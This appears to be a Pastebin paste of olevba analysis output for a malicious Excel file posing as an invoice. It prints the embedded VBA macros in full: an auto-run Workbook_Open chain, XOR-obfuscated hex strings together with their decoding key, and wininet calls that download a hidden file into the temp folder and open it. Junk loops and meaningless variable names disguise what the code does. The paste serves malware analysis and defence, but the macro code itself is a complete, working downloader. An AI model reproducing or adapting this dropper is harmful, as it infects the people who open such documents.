API tools faq
paste
Advertisement
dynamoo

Malicious Excel macro

dynamoo
Apr 14th, 2015
1,116
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 12.85 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- Invoice-83230.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: Invoice-83230.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub VICTOR(MARTIN As Long)
  17. JEREMY
  18. End Sub
  19.  
  20. Sub Workbook_Open()
  21. VICTOR 544
  22. End Sub
  23.  
  24.  
  25. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  26. ANALYSIS:
  27. +----------+---------------+----------------------------------------+
  28. | Type     | Keyword       | Description                            |
  29. +----------+---------------+----------------------------------------+
  30. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  31. +----------+---------------+----------------------------------------+
  32. -------------------------------------------------------------------------------
  33. VBA MACRO Ëèñò1.cls
  34. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  35. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  36. (empty macro)
  37. -------------------------------------------------------------------------------
  38. VBA MACRO Ëèñò2.cls
  39. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  40. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  41. (empty macro)
  42. -------------------------------------------------------------------------------
  43. VBA MACRO Ëèñò3.cls
  44. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  45. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  46. (empty macro)
  47. -------------------------------------------------------------------------------
  48. VBA MACRO Module1.bas
  49. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  50. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  51.  
  52. Option Explicit
  53.  
  54.  
  55. Public Const PATRICK = "1A242920356F1E413625252F2D2D28305F"
  56. Public Const PETER = "153F3829292A6E1F73286229343C"
  57. Public Const HAROLD = "2138383C636E7008747C2E2D2030233A50223A622F23346E66056979797F623C393A"
  58. Public Const DOUGLAS = "1A2F3E252935365F21670A25203C122642322C21032E33243C45"
  59. Public Const HENRY = "FILLLYA_1"
  60.  
  61.  
  62. Public Const JAMES = "JOHN"
  63.  
  64. #If VBA7 And Win64 Then
  65. Public _
  66. Declare _
  67. PtrSafe _
  68. Function _
  69. ROBERT Lib _
  70. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  71. Public _
  72. Declare _
  73. PtrSafe _
  74. Function _
  75. MICHAEL Lib _
  76. "wininet.dll" Alias "InternetOpenA" (ByVal CHARLES As String, ByVal JOSEPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As LongPtr
  77. Public _
  78. Declare _
  79. PtrSafe _
  80. Function _
  81. WILLIAM Lib _
  82. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  83. Public _
  84. Declare _
  85. PtrSafe _
  86. Function _
  87. DAVID Lib _
  88. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  89. #Else
  90. Public Declare Function ROBERT Lib "wininet.dll" _
  91. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  92. Public Declare Function MICHAEL Lib "wininet.dll" _
  93. Alias "InternetOpenA" (ByVal CHARLES As String, ByVal JOSEPH As Long, ByVal THOMAS As String, ByVal CHRISTOPHER As String, ByVal DANIEL As Long) As Long
  94. Public Declare Function WILLIAM Lib "wininet.dll" _
  95. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal MARK As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  96. Public Declare Function DAVID Lib "wininet.dll" _
  97. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal STEVEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  98. #End If
  99.  
  100.  
  101.  
  102. Private Const KEVIN = 8162
  103. Private Const JASON As String = "Perro"
  104. Private Const MATTHEW = 1
  105. Private Const GARY = &H4000000
  106.  
  107. Public Function TIMOTHY _
  108. (ByVal JOSE As String) As Boolean
  109.     #If VBA7 _
  110.     And Win64 Then
  111.         Dim LARRY As LongPtr, JEFFREY As LongPtr
  112.     #Else
  113.         Dim LARRY As Long, JEFFREY As Long
  114.     #End If
  115.     Dim FRANK As Long
  116.     Dim MARK As String * KEVIN, CHARLES As String
  117.     Dim SCOTT As Integer, ERIC As Double
  118.     LARRY = MICHAEL(JASON, MATTHEW, vbNullString, vbNullString, 0)
  119.     If LARRY = 0 Then
  120.         Exit Function
  121.     End If
  122.     Dim STEPHEN As Boolean
  123.    
  124.     If ANDREW(JEFFREY, LARRY) Then
  125.     End If
  126.     If JEFFREY = 0 Then
  127.         ERIC = 0
  128.     Else
  129.         WILLIAM JEFFREY, MARK, KEVIN, FRANK
  130.         CHARLES = MARK
  131.           Dim RAYMOND As Long
  132. For RAYMOND = 321 To 322
  133. If RAYMOND = 1232 Then End
  134. Next RAYMOND
  135.         Do While FRANK <> 0
  136.             WILLIAM JEFFREY, MARK, KEVIN, FRANK
  137.                     CHARLES = CHARLES + Mid(MARK, 1, FRANK)
  138.         Loop
  139.              ERIC = GREGORY(CHARLES): _
  140.              SCOTT = JOSHUA("JERRY")
  141.         Open JOSE _
  142.             For Binary Access Write _
  143.         Lock Write _
  144.         As #SCOTT
  145.         Put #SCOTT, _
  146.                 , CHARLES
  147.         Dim DENNIS As Double
  148.             For DENNIS = 42 To 43
  149.     If DENNIS = 437 Then End
  150. Next DENNIS
  151.         Close #SCOTT
  152.     End If
  153.     ROBERT JEFFREY
  154.     ROBERT LARRY
  155.     CHARLES = ""
  156.     If ERIC Then
  157.         TIMOTHY = True
  158.     End If
  159. End Function
  160.  
  161. Public Function VASILY(ByRef HARRY As Integer, ByRef FRED As Integer) As String
  162.     VASILY = Chr(HARRY Xor FRED)
  163. End Function
  164.  
  165. Public Function SEREGA(ByRef ADAM As String, ByRef BILLY As Long) As Integer
  166.  SEREGA = Val("&H" & (PETRO(ADAM, KOLYAN(BILLY), 2)))
  167. End Function
  168. Public Function KOLYAN(ByRef BILLY As Long) As Long
  169.  KOLYAN = (2 * BILLY) - 1
  170. End Function
  171. Public Function DENISKA(ByRef BRANDON As String, ByRef BILLY As Long) As Integer
  172. DENISKA = Asc(PETRO(BRANDON, _
  173.         ((BILLY Mod GREGORY(BRANDON)) + 1), 1))
  174. End Function
  175.  
  176. Public Function PETRO(ByRef WALTER As String, ByRef HARRY As Integer, ByRef FRED As Integer) As String
  177.     PETRO = Mid$(WALTER, HARRY, FRED)
  178. End Function
  179.  
  180. Public Function GREGORY(WALTER As String) As Long
  181. GREGORY = Len(WALTER)
  182. End Function
  183. Public Function JOSHUA(WALTER As String) As Integer
  184.     JOSHUA = FreeFile
  185. End Function
  186.  
  187.  
  188. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  189. ANALYSIS:
  190. +------------+----------------+-----------------------------------------+
  191. | Type       | Keyword        | Description                             |
  192. +------------+----------------+-----------------------------------------+
  193. | Suspicious | Lib            | May run code from a DLL                 |
  194. | Suspicious | Open           | May open a file                         |
  195. | Suspicious | Write          | May write to a file (if combined with   |
  196. |            |                | Open)                                   |
  197. | Suspicious | Put            | May write to a file (if combined with   |
  198. |            |                | Open)                                   |
  199. | Suspicious | Chr            | May attempt to obfuscate specific       |
  200. |            |                | strings                                 |
  201. | Suspicious | Xor            | May attempt to obfuscate specific       |
  202. |            |                | strings                                 |
  203. | Suspicious | Binary         | May read or write a binary file (if     |
  204. |            |                | combined with Open)                     |
  205. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  206. |            |                | be used to obfuscate strings (option    |
  207. |            |                | --decode to see all)                    |
  208. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  209. |            |                | may be used to obfuscate strings        |
  210. |            |                | (option --decode to see all)            |
  211. | IOC        | wininet.dll    | Executable file name                    |
  212. +------------+----------------+-----------------------------------------+
  213. -------------------------------------------------------------------------------
  214. VBA MACRO Module2.bas
  215. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  217.  
  218. Public Function ARTHUR(ByRef RYAN As Object, ByVal ROGER As String) As Boolean
  219. If RYAN.FileExists(ROGER) Then
  220. ARTHUR = True
  221. Else
  222. ARTHUR = False
  223. End If
  224. End Function
  225. #If VBA7 _
  226.     And Win64 Then
  227.        Public Function ANDREW(ByRef JOE As LongPtr, JUAN As LongPtr) As Boolean
  228.     #Else
  229.        Public Function ANDREW(ByRef JOE As Long, JUAN As Long) As Boolean
  230.     #End If
  231. Dim JACK As String
  232. Dim HOWARD As Long
  233.     JACK _
  234.     = EUGENE(325, HENRY, HAROLD)
  235.    
  236.                 JOE _
  237.     = DAVID _
  238.     ( _
  239.     JUAN, _
  240.     JACK, vbNullString, _
  241.     0, _
  242.     GARY, 0)
  243.     ANDREW = True
  244. End Function
  245.  
  246.  
  247.  
  248. Public Function EUGENE(BOBBY As Long, CARLOS As String, RUSSELL As String) As String
  249. EUGENE = ALBERT(CARLOS, RUSSELL)
  250.    
  251. End Function
  252.  
  253.  
  254.  
  255.  
  256. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  257. ANALYSIS:
  258. No suspicious keyword or IOC found.
  259. -------------------------------------------------------------------------------
  260. VBA MACRO Module3.bas
  261. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  262. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  263.  
  264.  
  265.  
  266.  
  267. Public Function JONATHAN()
  268.  
  269. Dim JUSTIN  As Object
  270. Set JUSTIN = KEITH
  271. Dim TERRY As Object
  272. Set TERRY = GERALD(JUSTIN)
  273.  
  274. Dim SAMUEL
  275. Dim WILLIE
  276. WILLIE = EUGENE(2332, HENRY, PETER)
  277. SAMUEL = TERRY & WILLIE
  278.  
  279.  
  280. If ARTHUR(JUSTIN, SAMUEL) Then
  281. JUSTIN. _
  282. DeleteFile SAMUEL
  283. End If
  284. If TIMOTHY(SAMUEL) Then
  285. End If
  286. If ARTHUR(JUSTIN, SAMUEL) Then
  287. End If
  288. Dim RALPH
  289. Set RALPH = CreateObject _
  290. (ALBERT _
  291. (HENRY, PATRICK))
  292. RALPH.Open SAMUEL
  293. End Function
  294.  
  295.  
  296.  
  297.  
  298. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  299. ANALYSIS:
  300. +------------+--------------+--------------------------+
  301. | Type       | Keyword      | Description              |
  302. +------------+--------------+--------------------------+
  303. | Suspicious | CreateObject | May create an OLE object |
  304. | Suspicious | Open         | May open a file          |
  305. +------------+--------------+--------------------------+
  306. -------------------------------------------------------------------------------
  307. VBA MACRO Module4.bas
  308. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module4'
  309. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  310.  
  311. Public Function KEITH() As Object
  312. Dim LAWRENCE As String
  313. LAWRENCE = ALBERT(HENRY, DOUGLAS)
  314. Set KEITH = CreateObject(LAWRENCE)
  315. End Function
  316. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  317. ANALYSIS:
  318. +------------+--------------+--------------------------+
  319. | Type       | Keyword      | Description              |
  320. +------------+--------------+--------------------------+
  321. | Suspicious | CreateObject | May create an OLE object |
  322. +------------+--------------+--------------------------+
  323. -------------------------------------------------------------------------------
  324. VBA MACRO Module5.bas
  325. in file: Invoice-83230.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module5'
  326. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  327. Public Function GERALD(ByRef NICHOLAS As Object) As Object
  328. Set GERALD = NICHOLAS.GetSpecialFolder(2)
  329. End Function
  330. Sub ROY(CALEIGH As Long)
  331.  
  332. BENJAMIN ("BRUCE")
  333. End Sub
  334.  
  335.  
  336. Public Function BENJAMIN(JONATHANs As String)
  337. JONATHAN
  338. End Function
  339.  
  340.  
  341. Public Function ALBERT(BRANDON As String, ADAM As String) As String
  342.    
  343.     Dim HARRY As Integer
  344.     Dim FRED As Integer
  345.    
  346.    
  347.     Dim WAYNE As Double
  348. For WAYNE = 42 To 43
  349. If WAYNE = 32 Then End
  350. Next WAYNE
  351.    
  352.     Dim BILLY As Long
  353.     Dim STEVE As String
  354.     For BILLY = 1 _
  355.     To _
  356.     ( _
  357.     GREGORY _
  358.     (ADAM) _
  359.     / 2)
  360.         HARRY = SEREGA(ADAM, BILLY)
  361.         FRED = DENISKA(BRANDON, BILLY)
  362.         STEVE = STEVE + VASILY(HARRY, FRED)
  363.     Next BILLY
  364.    ALBERT = STEVE
  365. End Function
  366.  
  367.  
  368. Sub JEREMY()
  369.         Dim AARON As Long
  370.  
  371.     Dim RANDY As Integer
  372. For RANDY = 414 To 416
  373. If RANDY = 1312 Then End
  374. Next RANDY
  375.  
  376. ROY (5)
  377.  
  378. End Sub
  379.  
  380.  
  381.  
  382. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  383. ANALYSIS:
  384. No suspicious keyword or IOC found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!